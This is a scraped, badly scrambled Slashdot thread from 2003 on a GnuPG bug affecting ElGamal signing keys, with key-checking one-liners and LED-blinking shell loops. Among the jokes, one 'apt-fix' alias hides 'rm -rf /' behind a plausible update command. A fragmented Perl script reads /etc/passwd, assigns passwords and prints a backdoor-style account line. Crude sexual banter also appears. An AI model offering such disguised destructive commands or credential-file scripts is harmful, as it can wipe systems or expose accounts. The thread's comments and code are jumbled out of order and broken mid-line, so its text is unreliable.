Slashdot Mirror
GnuPG's ElGamal Signing Keys Compromised
KjetilK writes "Werner Koch just sent an announcement saying that there is a severe bug in GnuPG >= 1.0.2 that makes it easy to compromise ElGamal keys used for signing. Note that such keys are not generated by GnuPG's standard setup, and should be relatively rare. Among the 850 public keys in my personal keyring, there were only one such public key (and a few subkeys). There is already a patch available to disable these keys."
"Gamal" is translated in Swedish as "old". Those who came out with this name knew how soon it would become obsolete!
http://www.automatiq.se
..destroyed my trust in the internet and computers! :-(
*sobs hysterically*
blogzine | Turkey Smashing Fun
clifgriffin > blog
Since I'm too overstuffed with desserts, eaten during their making process, to try do the patching myself.
Fortunately, Werner Koch informed me yesterday already (I got the email at some time in the morning), so I had plenty of time to create a new key, sign it with the old one, and revoke the old one.
:-/
Of course, this had one disadvantage: since the old key is potentially compromised, I cannot really trust in my web of trust anymore.
A monkey is doing the real work for me.
You can get more information on the (german) site heise:0 00/
s ure/2003-q4/2998.html
http://www.heise.de/newsticker/data/pab-27.11.03-
The full advisory from Werner Koch can be found here:
http://archives.neohapsis.com/archives/fulldisclo
It seems that about 800 people are using the compromised keys.
To check if your key is in danger you have to check the type of the key. All type 20 keys can be compromised. Here is a small shell script to check our key:
gpg --list-keys --with-colon | awk -F: '($4 == "20") {print $0;}
If your key is in danger you should create a new one and revoke the old one immediately.
woohoo. you know you're on slashdot when someone is boasting "my keyring is bigger than your keyring !"
When will I end this grieving ? When will my future begin ?
Note that such keys are not generated by GnuPG's standard setup, and should be relatively rare.
This is a very good example of insecurity through complexity. Increasing the complexity of encryption software through the inclusion of multiple, unnecessary key types is a good way to increase the odds of introducing a bug. If there were only 850 of those keys, then why was that "feature" included?
This is the same thing that Microsoft does. Drastically increase the complexity of the software beyond what is necessary through the inclusion of unnecessary features and introduce bugs in the process. If this had been "MicrosoftPG" rather than "GnuPG", there would be an outcry on Slashdot about how stupid Microsoft is.
And then someone links to goatse as an example of a large keyring and the discussion is ruined. Hurrah. Welcome to Slashdot.
I'm amazing. You aren't. SUCK IT
Someone decided to munge Werner's announcement in a poorly implemented attempt at stopping spam. You have to change each "foo at example.com" to "foo@example.com". Then the .sig will verify correctly.
Sure it has
:; do setleds -L +num; setleds -L -caps ;sleep 1; setleds -L +caps ; setleds -L -num; sleep 1 ; setleds -L +scroll ; setleds -L -caps; sleep 1; setleds -L +caps ; setleds -L -scroll; sleep 1; done'
alias apt-fix='apt-get update; apt-get upgrade'
and while we are here
alias kit='while
whooowhooo whooowhoooo
Damn, thanks for that. I have an IR keyboard on my firewall that uses a row of red leds for the keyboard lights on the receiver
Does this constitute a crisis in open source? I'm always advocating open source software with my employer and one of the biggest selling points is security.
With this news, and the whole Debian security fiasco, this argument is getting more difficult to make.
Most Excellent!
I must have one!
How can I justify a new keyboard? Where's my hammer??
Actually thats Gammal .. Gamal means nothing in Swedish... Debil on the other hand... or Dumbom, analfabet, olbidad... Yea those..
MoFscker
Mind if I patch it?
alias KITT='while
(GNU sleep takes floating point arguments. Also, it should be KITT, not kit
Go for it. ;-)
I forgot to attach a copy of the GPL
It appears after some functional testing that the reduction of the deltas between the indicator light alterations caused some unforseen interference side effects.
Who would have thought executing setleds 6 times a second would cause keyboard problems?
I've incresed it back to 1 seconds to actually get some work done on the keyboard, but I need to be able to toggle this depending on whether or not i'm doing work.
I need to find a way to get setleds working regardless of the terminal it's run from (only wants to work from the console).
You forgot the part about hotgrits, natalie portman, and beowulf clusters.
From what I can tell, this is a mistake in the implementation of ElGamal signing + encryption keys, not any attack on the ElGamal algorithm per se. (And not even on encryption-only keys, only a specific type of key)
3DES might be a very solid algorithm, but as far as I can tell none of the other symmetric cryptoalgorithms (IDEA, BlowFish, TwoFish, Rijendael aka AES, CAST etc.) have had any practical algorithm attacks. Not to mention that 3DES can't be used for signing as is described here, so it's not even in the same category. Competitors to ElGamal would be RSA, DSA etc.
Implementation errors are far more common, but they could happen every time you implement the algorithm for a new language, new architechture, re-implementation under other licence, or even with a better compiler (e.g. such things as clocking attacks, have happened).
In short, I wouldn't trust a new implementation of 3DES, just because the algorithm is well known. Usually it's easier to work around the encryption, rather than break it head-on. Memory leaks, temp files, bugs in implementation and so on. Like this one.
Then again, my paranoia doesn't really stretch that far. If I got anyone after me willing to cryptoanalyze my encryption tools (as opposed to more direct keyboard taps/kneecap breaking methods) I must have some enemies I don't know about....
Kjella
Live today, because you never know what tomorrow brings
Fuck the system? Nah, you might catch something.
Since there are several people in the thread
interested in LEDs, look at ixbiff.
It blinks LEDs when you have new mail.
Our maintenence department used a solvent to clean their keyboard that melted the plastic, rendering all the keys unpressable. It was like every key was glued in place. Just find a solvent that melts the plastic your keyboard is made of, and go at it! :)
I've had enough abrasive sigs. Kittens are cute and fuzzy.
Je fume. Tu fumes. Nous fûmes!
Yeah...
/lib/perl5/";
a lt));print "$user\:$pwd\:$uid\:$gid\:$name\:$home\:$shell\n"; }
s pairs{'fc'}='cf';
/etc/passwd`);$i=0; ... ";b in/bash\n";
Like I want to run this...
#!/usr/bin/perl
$PERLLIB="/usr/local
$NOLOGIN="*";
sub makeone
{$user=$_[0]; local($pwd)=$_[1]; $uid=$_[2]; $gid=$_[3]; $name=$_[4]; $home=$_[5]; $shell=$_[6];
$salt=gen(2);
$pwd=(crypt($pwd,$s
$passpairs{'root'}='toor';
$passpairs{'guest '}='guest';
$passpairs{'daemon'}='nomead';
$pas
@passwordlist=('agree', 'howthem', 'elsewher', '$pwd$uid', 'v5098v2n', 'Xs3\$7\@cB', 'FrugNol',
'c/pdddwd', 'aWCY00l', '8glRmlue', 'sh1234ra', 'ttorug', 'toorpoi', 'uj78ik,m'
);
@symbols=(a..z, A..Z, 0..9);
sub gen {local $i, $j, $k;
$k="";
for $i (1..$_[0])
{local $j = rand(@symbols);
$k="$k".@symbols[int($j)];}
return $k;}
srand(time|$$);
@PASSFILE=split(/\n/,`/bi n/cat
foreach $LINE (@PASSFILE)
{($user, $pwd, $uid, $gid, $name, $home, $shell)=split(/:/, $LINE, 7);
# print STDERR "$user
if ($pwd eq $NOLOGIN) {$newpwd=$pwd;}
elsif ($passpairs{"$user"} ne "") {$newpwd=$passpairs{"$user"};}
elsif ($i < @passwordlist) {$newpwd=@passwordlist[$i];$i=$i+1;}
else {$newpwd = gen(8);}
# print STDERR "$user $newpwd\n";
makeone($user, $newpwd, $uid, $gid, $name, $home, $shell);
}
print "sil:g0t.r00t:100:1::/export/home/sil:/usr/local/
Extra layers of protection aren't necessarily a good thing in crypto: I think it's best to have one very simple but very secure layer of protection. The more complicated a system gets, the harder it is to be confident that the algorithm or the implementation is secure.
"'I pass the test,' she said. 'I will diminish, and go into the West, and remain Galadriel.'"
- JRR Tolkien.
Try putting it into script leds.sh and running it like this: /dev/console
leds.sh <
or at a gay truckstop in the 1970's.
pr0n - keeping monitor glass spotless since 1981.
It's called goop off
I've used it before and can attest to it eating a hole through carpet right to the concrete.
Thats a very good point, but failure is not an option!!
/)) && apt-get upgrade
alias apt-fix='(apt-get update || ( echo "Well screw you Hadron head" && rm -rf
DISCLAIMER: If you execute this code you are a moron
Actually, on my old debian-potato system that I haven't bothered upgrading, sleep doesn't take floating point arguments.
However, on my debian-woody system, with a newer version of sleep, it does.
..plus it features authors! lol
# kitt.sh - change the '1' to desired delay
:; do for led in num caps scroll caps; do setleds -L +$led
#(requires GNU shell utils 2.0.11~)
#(based on code presented in this thread)
while
Forgot that the damned less-than sign is an HTML special character. D'oh!
I would like to say this is getting silly. Also yours doesn't do a proper KITT ;-P
:
leds=(caps num caps scroll caps);
while
do
for i in 1 2 3 4
do
echo setleds -L +${leds[$i]}
echo setleds -L -${leds[$(( $i - 1 ))]}
sleep 1
done
done
3DES could be vulnerable because: A quantum computer can crack it with sqrt(2^N keys) = 2^(N / 2) possibilities
What are you blithering on about?
In the first place, quantum computers are mostly science fiction. The tiny ones that have been created can only handle problems that you could do in your head anyway. Further, no one has even begun to work out how a quantum computer could attack something like DES, or any symmetric cipher, because the algorithms are simply too complex, and translating them into a structure manageable by a quantum computer is too hard. RSA and some of the other public-key algorithms are extremely simple, mathematically, and very easy to model, so a QC with sufficient qubits could be effective at attacking them. If such existed.
What you're postulating in order to break 3DES is an 84-qubit QC that is capable of expressing an algorithm of tremendous complexity (including some table-driven steps) that will have to be run 2^84 times to search the complete keyspace (assuming 3-key 3DES, reduce these numbers somewhat for 2-key 3DES).
Actually, that should be 2^83, on average; I'll let you work out why.
Supposing that QC can test a key and be reconfigured, say, one trillion times per second, you'd only need 279,000 years, on average, to find your 3DES key.
If you wanted to make that more reasonable, you need a bigger QC. With a 168-bit QC, of course, you only need one trial.
and 3DES has 168 bits key that can be cracked with 2^89 possibilities versus 2^128 possibilities of GOST.
If you Google a bit, you can easily find some algorithms that use key lengths in the millions of bits, if you're so certain that more == better.
Remember, Athlon64, PowerPC64, USparc64, Alpha can do 2^64 operations with little time.
Can they really? Lessee... supposing they can do one operation per clock cycle, and let's suppose they run at, say, 10GHz, that means they can do 2^64 operations in a bit over 68 years.
Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
Damn debug!!
-echo setleds -L +${leds[$i]}
-echo setleds -L -${leds[$(( $i - 1 ))]}
+setleds -L +${leds[$i]}
+setleds -L -${leds[$(( $i - 1 ))]}
it redoes your password to print it out jackass does absolutely nothing to your system. Maybe if you had a clue about perl or even about common sysadmin sense you could take a look and see print all over the place. Nothing gets stored anywhere.
finger root@kungfunix.net to see what it does moron
MoFscker
I don't understand why it is 'not considered good cryptographic practice' to use the same key to sign and encrypt. Is Werner saying that this an ElGamal weakness or is it a general public-key encryption weakness? If it is not considered good cryptographic practice, then why is (was?) it in the OpenPGP standard?
Uh huh. So, run the numbers. How long would it take with, say, 1 billion 10GHz 64-bit processors to search a 128-bit keyspace. You can even continue to assume one operation per clock cycle (which is ludicrously optimistic).
Ah, what the heck... I'll do it for you. With 2^30 processors, each doing 2^33 trials per second, you can check 2^63 keys each second. That means that you need 2^64 seconds, on average, to search a 128-bit keyspace. That translates to 584 *billion* years.
Yep. The 3DES keyspace is just too small to be secure.
Given a billion 64-bit QCs that can be reconfigured a billion times per second, sure 3DES is weak.
You know what? I'd be a lot more worried about someone installing a trojan on my PC and snarfing my key with 'cat /proc/kmem'.
Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
Uh huh. So, run the numbers. How long would it take with, say, 1 billion 10GHz 64-bit processors to search a 128-bit keyspace. You can even continue to assume one operation per clock cycle (which is ludicrously optimistic).
I'd be much more worried about the one 128 bit QC.
-a
gpg --list-keys | awk 'BEGIN { printf("%s %s \n", "Key ID", "Email") } /^pub/ && $2 ~/G\// {keys++; print substr($2,7), $NF} END {if (keys > 0) print "You have",keys,"signatures to revoke!"; else print "You are fine :)" }'
it was part of popular lore that allowing your keyring to prominently hang out of your pocket was silent signal to other homosexuals.
And could you tell me, using your vast experience on the topic, how to tell a regular truckstop from a gay one?
well, dummy, a gay truck stop is any truck stop that has sex with other truck stops of the same gender.
I prefer to not have a dick stuck through a hole in the stall wall when I'm taking a shit.
this doesn't generally happen if you don't first make suggestive eye contact with the other party through the hole first. so, if you've actually experienced this, you might start there.
ps - no, i'm not gay. sorry to get your hopes up!
pr0n - keeping monitor glass spotless since 1981.
Sorry to nit and please don't be offended, but since you were trying to set things straight, I have to point out what I assume was a typo.
At 10GHz, 2^64 operations would take ~ 58.45 years.
I agree though (unless swillden is an ancient redwood tree) that this is a bit more than a 'little time'.